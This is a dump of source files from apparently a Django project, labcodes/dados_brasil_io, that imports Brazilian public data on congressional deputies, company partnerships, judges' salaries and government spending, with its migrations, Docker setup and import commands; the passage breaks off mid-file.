"/comum/migrations/0001_initial.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-04 18:25\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Estado',\n fields=[\n ('sigla', models.CharField(max_length=2, primary_key=True, serialize=False)),\n ('nome', models.CharField(max_length=255)),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.5836092829704285, "alphanum_fraction": 0.5877483487129211, "avg_line_length": 30.789474487304688, "blob_id": "15e9b6a963fded9161fb1aed5d04e4ad7647f6de", "content_id": "06e82a5b4a0c506c6e9a48053db26b18d14a7119", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1208, "license_type": "no_license", "max_line_length": 98, "num_lines": 38, "path": "/politicos/management/commands/import_deputados.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "import requests\nfrom django.core.management import BaseCommand\n\nfrom politicos.models import Deputado\n\nclass Command(BaseCommand):\n\n def pega_proxima_pagina(self, resposta):\n tem_proxima_pagina = [\n link['href'] for link in resposta['links']\n if link['rel'] == 'next'\n ]\n return tem_proxima_pagina and tem_proxima_pagina[0]\n\n\n def handle(self, *args, **options):\n deputados = []\n\n camara_url = 'https://dadosabertos.camara.leg.br/api/v2/deputados/?formato=json&itens=100'\n\n resposta = requests.get(camara_url).json()\n\n proxima_pagina = self.pega_proxima_pagina(resposta)\n\n while proxima_pagina:\n for deputado in resposta['dados']:\n deputados.append(Deputado(\n id=deputado['id'],\n nome=deputado['nome'],\n partido_id=deputado['siglaPartido'],\n uf_id=deputado['siglaUf'],\n id_legislatura=deputado['idLegislatura']\n ))\n\n resposta = requests.get(proxima_pagina).json()\n proxima_pagina = 
self.pega_proxima_pagina(resposta)\n\n Deputado.objects.bulk_create(deputados)\n" }, { "alpha_fraction": 0.7204724550247192, "alphanum_fraction": 0.7559055089950562, "avg_line_length": 24.399999618530273, "blob_id": "6a3d21e4e43d5725bd48086b1615e7c22c11bb0a", "content_id": "db0a294a84fcb72801ac8cc1cdb7793bb4f550e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 254, "license_type": "no_license", "max_line_length": 75, "num_lines": 10, "path": "/docker/django/entrypoint.sh", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nuntil python manage.py migrate --settings=dados_brasil_io.settings\ndo\n echo \"Esperando pela database...\"\n sleep 2\ndone\n\npython manage.py collectstatic\npython manage.py runserver 0.0.0.0:8000 --settings=dados_brasil_io.settings\n" }, { "alpha_fraction": 0.49346405267715454, "alphanum_fraction": 0.6993464231491089, "avg_line_length": 15.54054069519043, "blob_id": "b81a3fcd07d4f5c42410b18e159530a64fd3bc46", "content_id": "061bb2cfe65552302fe4f74cdb4ddd6fa8cd0f82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 612, "license_type": "no_license", "max_line_length": 26, "num_lines": 37, "path": "/requirements.txt", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": 
"backcall==0.1.0\ncertifi==2018.4.16\nchardet==3.0.4\ncycler==0.10.0\ndateutils==0.6.6\ndecorator==4.2.1\nDjango==2.0.4\ndjangorestframework==3.9.1\nidna==2.6\nipdb==0.11\nipython==6.3.1\nipython-genutils==0.2.0\njedi==0.11.1\nkiwisolver==1.0.1\nmatplotlib==2.2.2\nnumpy==1.14.3\npandas==0.22.0\nparso==0.1.1\npexpect==4.5.0\npickleshare==0.7.4\nprompt-toolkit==1.0.15\npsycopg2==2.7.4\nptyprocess==0.5.2\nPygments==2.2.0\npyparsing==2.2.0\npython-dateutil==2.7.2\npython-decouple==3.1\npytz==2018.4\nrequests==2.18.4\nrows==0.3.1\nsimplegeneric==0.8.1\nsix==1.11.0\ntqdm==4.22.0\ntraitlets==4.3.2\nunicodecsv==0.14.1\nurllib3==1.22\nwcwidth==0.1.7\n" }, { "alpha_fraction": 0.541436493396759, "alphanum_fraction": 0.580110490322113, "avg_line_length": 23.68181800842285, "blob_id": "a375cf29cad55dd5b025880c30f23b50494f5f7a", "content_id": "a9b1fcc23c9126a404fd40eec30e56ecb40bcce3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 543, "license_type": "no_license", "max_line_length": 76, "num_lines": 22, "path": "/empresas/migrations/0003_auto_20180504_2040.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-04 20:40\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('empresas', '0002_remove_empresa_unidade_federativa'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='socio',\n name='empresa_origem',\n ),\n migrations.AddField(\n model_name='socio',\n name='cpf_cnpj_socio',\n field=models.CharField(db_index=True, max_length=14, null=True),\n ),\n ]\n" }, { "alpha_fraction": 0.564434826374054, "alphanum_fraction": 0.5676745772361755, "avg_line_length": 46.06779479980469, "blob_id": "4191dc37735ef592cd610e9c2adff6697a1fe849", "content_id": "9870647ce0fcf2d445fe571ca14017b28b536172", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 2780, "license_type": "no_license", "max_line_length": 141, "num_lines": 59, "path": "/empresas/management/commands/import_pessoas_juridicas.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from datetime import datetime\nimport pandas as pd\nfrom django.core.management import BaseCommand\nfrom django.db import transaction\n\nfrom empresas.models import Empresa, Sociedade\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('csv', type=str)\n parser.add_argument('uf', type=str)\n parser.add_argument('inicio', type=int)\n\n def handle(self, *args, **options):\n uf = options['uf']\n log = open(f'{uf}_PJ_LOG.txt', 'w')\n cnpjs_nao_registrados = open(f'INVALIDOS_LOG.txt', 'a')\n\n log.write(f'{datetime.now().isoformat()} Abrindo CSV para PJ\\n')\n csv = pd.read_csv(\n options['csv'],\n chunksize=100000,\n dtype={'cpf_cnpj_socio': str, 'cnpj_empresa': str}\n )\n cnpjs_salvos = sorted(Empresa.objects.values_list('cnpj', flat=True))\n\n for contador, grupo in enumerate(csv):\n if contador >= options.get('inicio', 0):\n log.write(f'{datetime.now().isoformat()} Filtrando socios PJ do grupo {contador}\\n')\n grupo = grupo[grupo['codigo_tipo_socio'] == 1]\n sociedades = []\n\n log.write(f'{datetime.now().isoformat()} Criando empresas com cnpj invalido do grupo {contador}\\n')\n invalidos = grupo[~grupo['cpf_cnpj_socio'].isin(cnpjs_salvos)]\n for dados in invalidos.itertuples():\n cnpjs_nao_registrados.write(f'{dados.cpf_cnpj_socio};{dados.nome_socio};{uf};{dados.cnpj_empresa};{dados.nome_empresa}]')\n invalidos = invalidos.drop_duplicates(['cpf_cnpj_socio'])\n empresas_invalidas = []\n for dados in invalidos.itertuples():\n empresas_invalidas.append(Empresa(\n nome=f'INVALIDO {dados.nome_socio}',\n cnpj=dados.cpf_cnpj_socio,\n uf_id=uf,\n ))\n cnpjs_salvos.append(dados.cpf_cnpj_socio)\n Empresa.objects.bulk_create(empresas_invalidas)\n\n log.write(f'{datetime.now().isoformat()} Importando 
sociedades do grupo {contador}\\n')\n for dados in grupo.itertuples():\n sociedades.append(Sociedade(\n tipo_socio=1,\n qualificacao_socio=dados.codigo_qualificacao_socio,\n empresa_id=dados.cnpj_empresa,\n socio_pessoa_juridica_id=dados.cpf_cnpj_socio\n ))\n log.write(f'{datetime.now().isoformat()} Cirando Sociedades do grupo {contador}\\n')\n Sociedade.objects.bulk_create(sociedades)\n log.write(f'{datetime.now().isoformat()} Importação finalizada\\n')\n\n" }, { "alpha_fraction": 0.6619718074798584, "alphanum_fraction": 0.6807511448860168, "avg_line_length": 22.66666603088379, "blob_id": "7dbf24a3f2fcd172e85ed71cb2d3e50127ee4da7", "content_id": "3572221547a45ea92ce4996a6d9faf8c1d153326", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 213, "license_type": "no_license", "max_line_length": 60, "num_lines": 9, "path": "/comum/models.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass Estado(models.Model):\n sigla = models.CharField(max_length=2, primary_key=True)\n nome = models.CharField(max_length=255)\n\n def __str__(self):\n return self.nome\n" }, { "alpha_fraction": 0.7366254925727844, "alphanum_fraction": 0.748971164226532, "avg_line_length": 17.769229888916016, "blob_id": "068a9612008ccd0fe0ae8b448d77f3762410abf5", "content_id": "697ad17eeda7017c03bae073bf4cadd8900af56e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 243, "license_type": "no_license", "max_line_length": 49, "num_lines": 13, "path": "/docker/django/Dockerfile", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "FROM python:3.6\n\nENV PYTHONUNBUFFERED 1\n\nWORKDIR /app\nCOPY requirements.txt /app\nCOPY . 
/app\n\nRUN pip install -r requirements.txt\n\nCOPY ./docker/django/entrypoint.sh /entrypoint.sh\nRUN sed -i 's/\\r//' /entrypoint.sh\nRUN chmod +x /entrypoint.sh" }, { "alpha_fraction": 0.4671874940395355, "alphanum_fraction": 0.49687498807907104, "avg_line_length": 19.612903594970703, "blob_id": "274227f8e657ddfc0ca3fa87044d1861f33f732c", "content_id": "19363ecf84f63ee972968d4d06d380fb743ba6df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "YAML", "length_bytes": 640, "license_type": "no_license", "max_line_length": 50, "num_lines": 31, "path": "/docker-compose.yml", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "version: '2'\n\nvolumes:\n brasilio: {}\n\nservices:\n database:\n container_name: database\n restart: always\n env_file: .env\n image: postgres:9.6\n volumes:\n - brasilio:/var/lib/postgresql/data\n ports:\n - 5433:5432\n\n webserver:\n container_name: webserver\n restart: on-failure\n image: maribedran/brasilio\n build:\n context: .\n dockerfile: ./docker/django/Dockerfile\n entrypoint:\n - /entrypoint.sh\n volumes:\n - .:/app\n links:\n - database\n ports:\n - 8010:8000\n\n" }, { "alpha_fraction": 0.5427920818328857, "alphanum_fraction": 0.560852587223053, "avg_line_length": 34.73255920410156, "blob_id": "71312bb318518818d6bf55ee83a48679bbc5a993", "content_id": "b49bbdbb8009cb8d41d36698282a580304e1f3c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6188, "license_type": "no_license", "max_line_length": 101, "num_lines": 172, "path": "/empresas/models.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.db.models import Case, Count, F, OuterRef, Q, Subquery, Sum, Value, When\nfrom django.db.models.functions import Coalesce\n\n\nclass EmpresaQuerySet(models.QuerySet):\n\n def annotate_deputados(self):\n from politicos.models import Deputado\n deputados_qs = 
Deputado.objects.values_list('nome', flat=True)\n return self.annotate(\n deputado=Subquery(\n deputados_qs.filter(\n nome__in=OuterRef('sociedades__socio_pessoa_fisica__nome')\n )\n )\n )\n\n def annotate_deputados2(self):\n from politicos.models import Deputado\n deputados_qs = Deputado.objects.values_list('nome', flat=True)\n return self.annotate(\n deputado=Q(sociedades__socio_pessoa_fisica__nome__in=deputados_qs)\n )\n\n def annotate_graus_sociedades(self, grau):\n lookups = lambda x: '__'.join(['participacoes_sociedades__socio_pessoa_juridica'] * x)\n annotate_graus_sociedades = {\n f'grau_{n}': Coalesce(\n Sum(\n Case(\n When(\n Q(**{f'{lookups(n)}__isnull': False})\n &\n ~Q(**{f'{lookups(n)}': F(f'{lookups(n - 1)}' if n - 1 else 'cnpj')})\n &\n ~Q(**{f'{lookups(n)}': F(f'{lookups(n - 2)}' if n - 2 > 0 else 'cnpj')}),\n then=Value(1)\n ),\n output_field=models.IntegerField(),\n )\n ),\n 0,\n )\n for n in range(1, grau + 1)\n }\n return self.annotate(**annotate_graus_sociedades)\n\n def annotate_graus_sociedades2(self, grau):\n lookups = lambda x: '__'.join(['participacoes_sociedades__socio_pessoa_juridica'] * x)\n annotate_graus_sociedades = {\n f'grau_{n}': Count(\n Q(**{f'{lookups(n)}__isnull': False})\n &\n ~Q(**{f'{lookups(n)}': F(f'{lookups(n - 1)}' if n - 1 else 'cnpj')})\n &\n ~Q(**{f'{lookups(n)}': F(f'{lookups(n - 2)}' if n - 2 > 0 else 'cnpj')}),\n then=Value(1)\n )\n for n in range(1, grau + 1)\n }\n return self.annotate(**annotate_graus_sociedades)\n\n\n\nclass Empresa(models.Model):\n cnpj = models.CharField(max_length=14, primary_key=True)\n nome = models.CharField(max_length=255, null=True, db_index=True)\n uf = models.ForeignKey(\n 'comum.Estado',\n db_index=True,\n related_name='empresas',\n on_delete=models.PROTECT,\n )\n\n objects = EmpresaQuerySet.as_manager()\n\n\nclass PessoaFisica(models.Model):\n nome = models.CharField(max_length=255, null=True, db_index=True)\n\n\nclass Estrangeiro(models.Model):\n nome = 
models.CharField(max_length=255, null=True, db_index=True)\n\n\nclass Sociedade(models.Model):\n TIPOS_SOCIO = (\n (1, 'Pessoa Jurídica'),\n (2, 'Pessoa Física'),\n (3, 'Nome Exterior'),\n )\n QUALIFICACOES_SOCIO = (\n (5, 'Administrador'),\n (8, 'Conselheiro de Administração'),\n (10, 'Diretor'),\n (16, 'Presidente'),\n (17, 'Procurador'),\n (20, 'Sociedade Consorciada'),\n (21, 'Sociedade Filiada'),\n (22, 'Sócio'),\n (23, 'Sócio Capitalista'),\n (24, 'Sócio Comanditado'),\n (25, 'Sócio Comanditário'),\n (26, 'Sócio de Indústria'),\n (28, 'Sócio-Gerente'),\n (29, 'Sócio Incapaz ou Relat.Incapaz (exceto menor)'),\n (30, 'Sócio Menor (Assistido/Representado)'),\n (31, 'Sócio Ostensivo'),\n (37, 'Sócio Pessoa Jurídica Domiciliado no Exterior'),\n (38, 'Sócio Pessoa Física Residente no Exterior'),\n (47, 'Sócio Pessoa Física Residente no Brasil'),\n (48, 'Sócio Pessoa Jurídica Domiciliado no Brasil'),\n (49, 'Sócio-Administrador'),\n (52, 'Sócio com Capital'),\n (53, 'Sócio sem Capital'),\n (54, 'Fundador'),\n (55, 'Sócio Comanditado Residente no Exterior'),\n (56, 'Sócio Comanditário Pessoa Física Residente no Exterior'),\n (57, 'Sócio Comanditário Pessoa Jurídica Domiciliado no Exterior'),\n (58, 'Sócio Comanditário Incapaz'),\n (59, 'Produtor Rural'),\n (63, 'Cotas em Tesouraria'),\n (65, 'Titular Pessoa Física Residente ou Domiciliado no Brasil'),\n (66, 'Titular Pessoa Física Residente ou Domiciliado no Exterior'),\n (67, 'Titular Pessoa Física Incapaz ou Relativamente Incapaz (exceto menor)'),\n (68, 'Titular Pessoa Física Menor (Assistido/Representado)'),\n (70, 'Administrador Residente ou Domiciliado no Exterior'),\n (71, 'Conselheiro de Administração Residente ou Domiciliado no Exterior'),\n (72, 'Diretor Residente ou Domiciliado no Exterior'),\n (73, 'Presidente Residente ou Domiciliado no Exterior'),\n (74, 'Sócio-Administrador Residente ou Domiciliado no Exterior'),\n (75, 'Fundador Residente ou Domiciliado no Exterior'),\n )\n\n tipo_socio = 
models.PositiveSmallIntegerField(\n choices=TIPOS_SOCIO,\n null=True,\n db_index=True\n )\n qualificacao_socio = models.PositiveSmallIntegerField(\n choices=QUALIFICACOES_SOCIO,\n null=True\n )\n empresa = models.ForeignKey(\n Empresa,\n related_name='sociedades',\n null=True,\n on_delete=models.PROTECT,\n db_index=True\n )\n socio_pessoa_juridica = models.ForeignKey(\n Empresa,\n related_name='participacoes_sociedades',\n null=True,\n on_delete=models.PROTECT,\n db_index=True\n )\n socio_pessoa_fisica = models.ForeignKey(\n PessoaFisica,\n related_name='participacoes_sociedades',\n null=True,\n on_delete=models.PROTECT,\n db_index=True\n )\n socio_estrangeiro = models.ForeignKey(\n Estrangeiro,\n related_name='participacoes_sociedades',\n null=True,\n on_delete=models.PROTECT,\n db_index=True\n )\n" }, { "alpha_fraction": 0.5697036385536194, "alphanum_fraction": 0.5735455751419067, "avg_line_length": 38.58695602416992, "blob_id": "56eaf8ea1bd5bf8e5c6e06f470a6e63fe1c93625", "content_id": "718e805e935c02bee61410beabd0077bfdddd1a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1822, "license_type": "no_license", "max_line_length": 122, "num_lines": 46, "path": "/empresas/management/commands/import_empresas.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "import bisect\nfrom datetime import datetime\nimport pandas as pd\nfrom django.core.management import BaseCommand\nfrom django.db import transaction\n\nfrom empresas.models import Empresa\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('csv', type=str)\n parser.add_argument('uf', type=str)\n parser.add_argument('inicio', type=int)\n\n def handle(self, *args, **options):\n uf = options['uf']\n log = open(f'{uf}_EMPRESAS_LOG.txt', 'w')\n\n cnpjs_salvos = sorted(Empresa.objects.values_list('cnpj', flat=True))\n\n log.write(f'{datetime.now().isoformat()} Abrindo CSV para {uf}\\n')\n csv = 
pd.read_csv(\n options['csv'],\n chunksize=100000,\n dtype={'cpf_cnpj_socio': str, 'cnpj_empresa': str}\n )\n\n for contador, grupo in enumerate(csv):\n if contador >= options.get('inicio', 0):\n log.write(f'{datetime.now().isoformat()} Removendo duplicatas de empresas do grupo {contador} do {uf}\\n')\n grupo = grupo.drop_duplicates(['cnpj_empresa'], keep='first')\n grupo = grupo[~grupo['cnpj_empresa'].isin(cnpjs_salvos)]\n\n log.write(f'{datetime.now().isoformat()} Importando dados de empresas do grupo {contador} do {uf}\\n')\n empresas = []\n for dados in grupo.itertuples():\n empresas.append(Empresa(\n cnpj=dados.cnpj_empresa,\n nome=dados.nome_empresa,\n uf_id=uf\n ))\n bisect.insort(cnpjs_salvos, dados.cnpj_empresa)\n\n log.write(f'{datetime.now().isoformat()} Cirando Empresas do grupo {contador} do {uf}\\n')\n Empresa.objects.bulk_create(empresas)\n\n" }, { "alpha_fraction": 0.5460454821586609, "alphanum_fraction": 0.5872156023979187, "avg_line_length": 34.5, "blob_id": "0f44bc291a659259d09307f9d0155861c842acc3", "content_id": "ccc58426a5529fc4b7538200279ce93d3e925c5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 923, "license_type": "no_license", "max_line_length": 116, "num_lines": 26, "path": "/politicos/migrations/0003_deputado.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-04 18:56\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('comum', '0001_initial'),\n ('politicos', '0002_auto_20180504_1821'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Deputado',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('id_camara', models.IntegerField()),\n ('nome', models.CharField(max_length=255)),\n ('id_legislatura', models.IntegerField()),\n ('partido', 
models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='politicos.Partido')),\n ('uf', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='comum.Estado')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.581818163394928, "alphanum_fraction": 0.6034091114997864, "avg_line_length": 30.428571701049805, "blob_id": "638486f5df781792c480fc9a486be3fde831f6a5", "content_id": "73c556a644dc5a00a3d923c97ca99a4bc12c7de0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 880, "license_type": "no_license", "max_line_length": 109, "num_lines": 28, "path": "/empresas/migrations/0006_auto_20180513_0541.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-13 05:41\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('empresas', '0005_empresa_uf'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='empresa',\n name='empresas',\n field=models.ManyToManyField(db_index=True, through='empresas.Sociedade', to='empresas.Empresa'),\n ),\n migrations.AlterField(\n model_name='estrangeiro',\n name='empresas',\n field=models.ManyToManyField(db_index=True, through='empresas.Sociedade', to='empresas.Empresa'),\n ),\n migrations.AlterField(\n model_name='pessoafisica',\n name='empresas',\n field=models.ManyToManyField(db_index=True, through='empresas.Sociedade', to='empresas.Empresa'),\n ),\n ]\n" }, { "alpha_fraction": 0.6685123443603516, "alphanum_fraction": 0.6864771842956543, "avg_line_length": 46.51462173461914, "blob_id": "c35bd016c9759cc22d36eeaaa61a44c6082b1f1d", "content_id": "083abbdc2fa32a48c9de1e708e14e7e4a240091e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8127, "license_type": "no_license", "max_line_length": 100, "num_lines": 171, "path": "/empresas/_models.py", "repo_name": "labcodes/dados_brasil_io", 
"src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass GastosDeputados(models.Model):\n # Deputado\n codlegislatura = models.IntegerField(null=True)\n # Gasto\n datemissao = models.DateTimeField(null=True)\n idedocumento = models.IntegerField(null=True)\n idecadastro = models.IntegerField(null=True)\n indtipodocumento = models.IntegerField(null=True)\n # Deputado\n nucarteiraparlamentar = models.IntegerField(null=True)\n nudeputadoid = models.IntegerField(null=True)\n nulegislatura = models.IntegerField(null=True)\n # Gasto\n numano = models.IntegerField(null=True)\n numespecificacaosubcota = models.IntegerField(null=True)\n numlote = models.IntegerField(null=True)\n nummes = models.IntegerField(null=True)\n numparcela = models.IntegerField(null=True)\n numressarcimento = models.IntegerField(null=True)\n numsubcota = models.IntegerField(null=True)\n # Deputado\n sgpartido = models.CharField(max_length=18, null=True)\n sguf = models.CharField(max_length=2, null=True)\n txnomeparlamentar = models.CharField(max_length=63, null=True)\n # Gasto\n txtcnpjcpf = models.CharField(max_length=14, null=True)\n txtdescricao = models.CharField(max_length=127, null=True)\n txtdescricaoespecificacao = models.CharField(max_length=31, null=True)\n txtfornecedor = models.CharField(max_length=255, null=True)\n txtnumero = models.CharField(max_length=63, null=True)\n txtpassageiro = models.CharField(max_length=63, null=True)\n txttrecho = models.CharField(max_length=127, null=True)\n vlrdocumento = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n vlrglosa = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n vlrliquido = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n vlrrestituicao = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n\n class Meta:\n indexes = [\n models.Index(fields=['-datemissao']),\n models.Index(fields=['datemissao']),\n models.Index(fields=['idedocumento']),\n 
models.Index(fields=['numressarcimento']),\n models.Index(fields=['sgpartido']),\n models.Index(fields=['sguf']),\n models.Index(fields=['txnomeparlamentar']),\n models.Index(fields=['txtcnpjcpf']),\n models.Index(fields=['txtdescricao']),\n models.Index(fields=['txtdescricaoespecificacao']),\n models.Index(fields=['txtfornecedor']),\n models.Index(fields=['vlrliquido']),\n ]\n ordering = ['-datemissao']\n\n\nclass SalariosMagistrados(models.Model):\n # Magistrado\n lotacao = models.CharField(max_length=255, null=True)\n cargo = models.CharField(max_length=63, null=True)\n cpf = models.CharField(max_length=11, null=True)\n # Salario\n data_de_publicacao = models.DateField(null=True)\n descontos_diversos = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n diarias = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n direitos_eventuais = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n direitos_pessoais = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n imposto_de_renda = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n indenizacoes = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n mesano_de_referencia = models.DateField(null=True)\n # Magistrado\n nome = models.CharField(max_length=63, null=True)\n orgao = models.CharField(max_length=63, null=True)\n # Salario\n previdencia_publica = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n remuneracao_do_orgao_de_origem = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n rendimento_liquido = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n retencao_por_teto_constitucional = models.DecimalField(max_digits=12, null=True, decimal_places=\n 2)\n subsidio = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n total_de_descontos = models.DecimalField(max_digits=12, null=True, decimal_places=2)\n total_de_rendimentos = models.DecimalField(max_digits=12, null=True, 
decimal_places=2)\n tribunal = models.CharField(max_length=127, null=True)\n url = models.CharField(max_length=2000, null=True)\n\n class Meta:\n indexes = [\n models.Index(fields=['cargo']),\n models.Index(fields=['mesano_de_referencia']),\n models.Index(fields=['nome']),\n models.Index(fields=['orgao']),\n models.Index(fields=['rendimento_liquido']),\n models.Index(fields=['retencao_por_teto_constitucional']),\n models.Index(fields=['total_de_rendimentos']),\n models.Index(fields=['tribunal']),\n ]\n ordering = ['tribunal', 'nome']\n\n\nclass SociosBrasil(models.Model):\n # Empresa\n cnpj_empresa = models.CharField(max_length=14, null=True)\n nome_empresa = models.CharField(max_length=255, null=True)\n codigo_tipo_socio = models.IntegerField(null=True)\n tipo_socio = models.CharField(max_length=15, null=True)\n # Socio\n cpf_cnpj_socio = models.CharField(max_length=14, null=True)\n # Empresa\n codigo_qualificacao_socio = models.IntegerField(null=True)\n qualificacao_socio = models.CharField(max_length=127, null=True)\n # Socio\n nome_socio = models.CharField(max_length=255, null=True)\n # Empresa\n unidade_federativa = models.CharField(max_length=2, null=True)\n\n class Meta:\n indexes = [\n models.Index(fields=['cnpj_empresa']),\n models.Index(fields=['nome_empresa']),\n models.Index(fields=['nome_socio']),\n models.Index(fields=['unidade_federativa']),\n ]\n ordering = ['cnpj_empresa', 'nome_socio']\n\n\nclass GastosDiretos(models.Model):\n ano = models.IntegerField(null=True)\n codigo_acao = models.CharField(max_length=4, null=True)\n codigo_elemento_despesa = models.IntegerField(null=True)\n codigo_favorecido = models.CharField(max_length=112, null=True)\n codigo_funcao = models.IntegerField(null=True)\n codigo_grupo_despesa = models.IntegerField(null=True)\n codigo_orgao = models.IntegerField(null=True)\n codigo_orgao_superior = models.IntegerField(null=True)\n codigo_programa = models.IntegerField(null=True)\n codigo_subfuncao = 
models.IntegerField(null=True)\n codigo_unidade_gestora = models.IntegerField(null=True)\n data_pagamento = models.DateField(null=True)\n data_pagamento_original = models.CharField(max_length=112, null=True)\n gestao_pagamento = models.CharField(max_length=112, null=True)\n linguagem_cidada = models.CharField(max_length=199, null=True)\n mes = models.IntegerField(null=True)\n nome_acao = models.CharField(max_length=247, null=True)\n nome_elemento_despesa = models.CharField(max_length=113, null=True)\n nome_favorecido = models.CharField(max_length=208, null=True)\n nome_funcao = models.CharField(max_length=21, null=True)\n nome_grupo_despesa = models.CharField(max_length=25, null=True)\n nome_orgao = models.CharField(max_length=45, null=True)\n nome_orgao_superior = models.CharField(max_length=45, null=True)\n nome_programa = models.CharField(max_length=110, null=True)\n nome_subfuncao = models.CharField(max_length=50, null=True)\n nome_unidade_gestora = models.CharField(max_length=45, null=True)\n numero_documento = models.CharField(max_length=112, null=True)\n valor = models.DecimalField(max_digits=18, null=True, decimal_places=2)\n\n class Meta:\n indexes = [\n models.Index(['-data_pagamento']),\n models.Index(['codigo_favorecido']),\n models.Index(['nome_elemento_despesa']),\n models.Index(['nome_favorecido']),\n models.Index(['nome_funcao']),\n models.Index(['nome_grupo_despesa']),\n models.Index(['nome_orgao_superior']),\n models.Index(['nome_subfuncao']),\n models.Index(['nome_unidade_gestora']),\n models.Index(['valor']),\n ]\n ordering = ['-data_pagamento', 'nome_favorecido']\n\n\n" }, { "alpha_fraction": 0.5547826290130615, "alphanum_fraction": 0.6156522035598755, "avg_line_length": 26.380952835083008, "blob_id": "5fb12d48cbd82204dca649efa82034689b59c14a", "content_id": "aaaec57ec8b53f988605b0f27272f9b3a34fa72c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 575, "license_type": "no_license", 
"max_line_length": 139, "num_lines": 21, "path": "/empresas/migrations/0005_empresa_uf.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-07 20:43\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('comum', '0001_initial'),\n ('empresas', '0004_auto_20180507_1717'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='empresa',\n name='uf',\n field=models.ForeignKey(default='ND', on_delete=django.db.models.deletion.PROTECT, related_name='empresas', to='comum.Estado'),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.5598944425582886, "alphanum_fraction": 0.5656992197036743, "avg_line_length": 42.04545593261719, "blob_id": "c5653e2e55909309954f0aa8254b0872f2cd7d48", "content_id": "79b0da66e90c2bf28cab66d45de216883821f87a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1895, "license_type": "no_license", "max_line_length": 101, "num_lines": 44, "path": "/empresas/management/commands/import_pessoas_fisicas.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from datetime import datetime\nimport pandas as pd\nfrom django.core.management import BaseCommand\nfrom django.db import transaction\n\nfrom empresas.models import PessoaFisica, Sociedade\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('csv', type=str)\n parser.add_argument('inicio', type=int)\n\n def handle(self, *args, **options):\n log = 